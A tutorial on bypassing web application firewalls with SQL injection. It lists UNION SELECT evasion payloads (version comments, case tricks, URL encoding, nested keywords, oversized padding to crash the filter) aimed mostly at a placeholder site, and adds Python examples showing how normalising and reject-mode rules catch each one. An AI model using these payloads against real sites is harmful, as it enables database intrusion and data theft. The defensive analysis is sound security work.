WAF Introduction
What is WAF?
A Web Application Firewall (WAF) is a product that protects web applications by applying a set of security policies to HTTP/HTTPS traffic. The bypasses below target WAFs whose SQL injection rules are string signatures: each one hands the WAF a string that does not match the signature while handing the database a query that still parses.
Basic/simple bypass methods:
1. Comments
http://www.site.com/index.php?page_id=-15 /*!UNION*//*!SELECT*/1,2,4....
MySQL executes the contents of /*! ... */ version comments, so the database still sees UNION SELECT, while a WAF that treats them as ordinary comments sees nothing.
2. Case variation
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,4....
SQL keywords are case-insensitive, so this defeats a case-sensitive signature.
3. Combine the previous two methods
http://www.site.com/index.php?page_id=-15 /*!UNIOn*//*!SelECt*/1,2,4....
4. Keyword replacement
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
This works against WAFs that delete the strings union and select from the input in a single pass instead of rejecting the request. After the filter runs, the value becomes UNION SELECT 1,2,3,4....
5. Inline comments with URL encoding
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,4....
U is replaced with %55, S with %53, and a /**/ comment is placed between union and select. This only helps when the WAF matches the raw, still-encoded value; the application URL-decodes the parameter before building the query, so the database sees UnION/**/SElecT and parses it as UNION SELECT.
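All five basic techniques live in the gap between what a signature sees and what the MySQL parser sees. The following Python example is added here and is not from the original article: it builds one constructed page_id value per technique (plus the version-comment probe used in the advanced section), runs each through a naive case-sensitive UNION\s+SELECT signature, and then through the same rule applied after a normalisation step that URL-decodes, unwraps /*!...*/ version comments, strips ordinary comments and case-folds. Payload strings are trimmed copies of the ones above; the function and rule names are illustrative and not from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample values for the page_id parameter, one per bypass
# technique listed above (the "...." tails from the page are dropped).
PAYLOADS = {
    "plain":          "-15 UNION SELECT 1,2,4",
    "comments":       "-15 /*!UNION*//*!SELECT*/1,2,4",
    "case":           "-15 uNIoN sELecT 1,2,4",
    "comments+case":  "-15 /*!UNIOn*//*!SelECt*/1,2,4",
    "encoded+inline": "-15 %55nION/**/%53ElecT 1,2,4",
    "probe":          "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4",
}

# A first-draft signature: case-sensitive, expects literal whitespace
# between the two keywords, and is matched against the raw (still
# URL-encoded) parameter value.
NAIVE_RULE = re.compile(r"UNION\s+SELECT")


def naive_waf_blocks(raw_value: str) -> bool:
    return NAIVE_RULE.search(raw_value) is not None


def normalize(raw_value: str) -> str:
    """Rewrite the value into the form the MySQL parser will see.

    1. URL-decode (the application decodes before building the query).
    2. /*!...*/ and /*!50000...*/ are version comments: MySQL executes
       their contents, so keep the contents and drop the delimiters.
    3. Ordinary /*...*/ comments are whitespace to the parser.
    4. Collapse whitespace (including %0A newlines) and case-fold.
    """
    s = unquote(raw_value)
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


# The same signature, applied after normalisation and without assuming
# that only whitespace separates the two keywords.
NORMALIZED_RULE = re.compile(r"\bunion\b.*\bselect\b")


def normalizing_waf_blocks(raw_value: str) -> bool:
    return NORMALIZED_RULE.search(normalize(raw_value)) is not None


def compare_rules() -> dict:
    """For each payload: (blocked by naive rule, blocked after normalising)."""
    return {
        name: (naive_waf_blocks(p), normalizing_waf_blocks(p))
        for name, p in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, (naive, normalized) in compare_rules().items():
        print(f"{name:15} naive={naive!s:5} normalized={normalized}")
```

Only the plain payload trips the naive rule; every evasion above is caught once the rule runs on the normalised form, which is the point of the whole list: the bypasses are bypasses of the signature's assumptions, not of the database.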
Advanced bypass methods:
1. Oversized request / WAF crash
Most WAFs are written in C/C++ and inspect requests through fixed-size buffers. Padding the query with a very long value can crash the WAF or push the real payload past the portion it inspects, so the UNION SELECT that follows the padding reaches the application unfiltered.
http://www.bkjia.com/index.php?page_id=-15+and+(select 1)=(select 0xAA[... about 1000 "A"s ...])+/*!UNIOn*/+/*!SeLECt*/+1,2,4....
You can probe the WAF with the following request:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4....
If a 500 error comes back, the WAF is choking on the request and the padding method above is worth trying.
2. Encode letters
http://www.site.com/index.php?page_id=-15 /*!U%6eion*//*!Se%6cect*/1,2,3,4....
%6e decodes to n and %6c to l, so after the application URL-decodes the parameter the database sees /*!Union*//*!Select*/. A WAF that matches keywords before decoding, or that does not look inside /*! */ comments, misses it.
3. Replace the injection statement with other functions or commands
COMMAND        | WHAT TO USE INSTEAD
@@version      | version()
concat()       | concat_ws()
group_concat() | concat_ws()
The replacements return the same data but are less often on signature lists. Note that concat_ws() joins columns of a single row, not values across rows, so it only stands in for group_concat() when one row is being read.
4. Use the WAF's own transformations against it
If you find that the WAF deletes "*" from the input, the deletion itself reassembles the keywords:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....
Other forms that avoid the literal "union select" sequence:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union(select 1,2,4...)
Each keyword must still reach the database parser as a single token, so verify every variant against the target DBMS before relying on it; for example, MySQL accepts union(select ...), but (UnI)(oN) is not a spelling of UNION that its parser accepts.
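The keyword-replacement trick in the basic list and the "*"-deletion trick here are the same bug seen from two sides: a WAF that rewrites the request can be made to manufacture the attack string itself. The Python example below is added here and is not from the original article. It models three WAF designs, a single-pass deleting sanitiser as described above, the same sanitiser iterated to a fixpoint, and a reject-mode check that tokenises the value and forwards nothing it has modified, and runs each over constructed page_id values copied from the list above. Function and constant names are illustrative.

```python
import re

BLOCKED_KEYWORDS = ("union", "select")


def waf_delete_once(value: str) -> str:
    """Rewriting WAF as described above: delete each blocked keyword in a
    single case-insensitive pass, delete every '*', forward the result."""
    for kw in BLOCKED_KEYWORDS:
        value = re.sub(kw, "", value, flags=re.I)
    return value.replace("*", "")


def waf_delete_to_fixpoint(value: str) -> str:
    """The same deletions, repeated until a pass changes nothing, so a
    keyword reassembled by one pass is removed by the next."""
    while True:
        cleaned = waf_delete_once(value)
        if cleaned == value:
            return cleaned
        value = cleaned


def waf_reject(value: str) -> bool:
    """Rejecting WAF: tokenise the value as the SQL parser would (run this
    after whatever comment/URL decoding the rule pipeline already does) and
    refuse the request when a UNION token is later followed by a SELECT
    token. Nothing is rewritten, so the WAF cannot create an attack."""
    tokens = re.findall(r"[a-z_]+", value.lower())
    if "union" not in tokens:
        return False
    return "select" in tokens[tokens.index("union"):]


def contains_union_select(sql_fragment: str) -> bool:
    """Does the fragment the database will receive carry UNION ... SELECT?"""
    return re.search(r"\bunion\b.*\bselect\b", sql_fragment, re.I) is not None


# Constructed page_id values, taken from the lists above.
NESTED = "-15 UNIunionON SELselectECT 1,2,3,4"    # keyword hidden inside keyword
STARRED = "-15 uni*on sel*ect 1,2,3,4"            # relies on the WAF deleting '*'
PARENS = "-15 (uNioN)+(sElECt) 1,2,4"             # no whitespace between keywords


def outcomes() -> dict:
    """For each payload: what each WAF design forwards or decides."""
    result = {}
    for name, p in (("nested", NESTED), ("starred", STARRED), ("parens", PARENS)):
        result[name] = {
            "raw_is_attack": contains_union_select(p),
            "delete_once_forwards_attack": contains_union_select(waf_delete_once(p)),
            "fixpoint_forwards_attack": contains_union_select(waf_delete_to_fixpoint(p)),
            "reject_blocks": waf_reject(p),
        }
    return result


if __name__ == "__main__":
    for name, o in outcomes().items():
        print(name, o)
```

The nested and starred values are not attacks as submitted: the database would see UNIunionON or uni*on and fail to parse them. The single-pass sanitiser turns both into UNION SELECT and forwards them; the fixpoint loop closes that hole but still forwards a query it has mutated. The reject-mode check passes the two harmless values and blocks the parenthesised one, which is the behaviour you want: normalise, decide, and never forward anything you have changed.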